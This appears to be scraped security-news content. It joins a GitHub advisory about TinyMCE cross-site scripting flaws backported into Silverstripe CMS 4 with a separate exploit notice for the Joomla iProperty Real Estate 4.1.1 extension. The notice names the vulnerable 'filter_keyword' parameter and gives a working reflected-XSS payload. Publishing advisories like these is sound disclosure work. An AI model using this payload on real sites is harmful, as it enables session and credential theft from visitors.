Only Silverstripe CMS 4 is affected by this issue. It's not possible to upgrade Silverstripe CMS 4 to use a more recent release of TinyMCE without introducing breaking changes. Instead, the security patches that shipped in later releases of TinyMCE have been backported to the TinyMCE version bundled in silverstripe/admin.

Silverstripe CMS 5 is not affected by those vulnerabilities because it uses TinyMCE 6.

You can find more information about the underlying vulnerabilities in those GitHub security advisories:

*   GHSA-5h9g-x5rv-25wg Cross-site scripting vulnerability in TinyMCE
*   GHSA-w7jx-j77m-wp65 Cross-site scripting vulnerability in TinyMCE

**References**

*   GHSA-4q66-g4mm-8rg5
*   silverstripe/silverstripe-admin@cafc1c4
*   GHSA-5h9g-x5rv-25wg
*   GHSA-w7jx-j77m-wp65

 maxime-rainville published to silverstripe/silverstripe-admin

Jul 31, 2023

Published to the GitHub Advisory Database

Jul 31, 2023

Reviewed

Jul 31, 2023

GHSA-4q66-g4mm-8rg5: Silverstripe has Cross-site Scripting (XSS) vulnerabilities inherited from TinyMCE

Joomla iProperty Real Estate extension version 4.1.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Joomla iProperty Real Estate 4.1.1 - Reflected XSS# Exploit Author: CraCkEr# Date: 29/07/2023# Vendor: The Thinkery LLC# Vendor Homepage: http://thethinkery.net# Software Link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/# Demo: https://iproperty.thethinkery.net/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /iproperty/property-views/all-properties-with-mapGET parameter 'filter_keyword' is vulnerable to XSShttps://website/iproperty/property-views/all-properties-with-map?filter_keyword=[XSS]&option=com_iproperty&view=allproperties&ipquicksearch=1XSS Payload: pihil"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f63m4[-] Done

Tag

#xss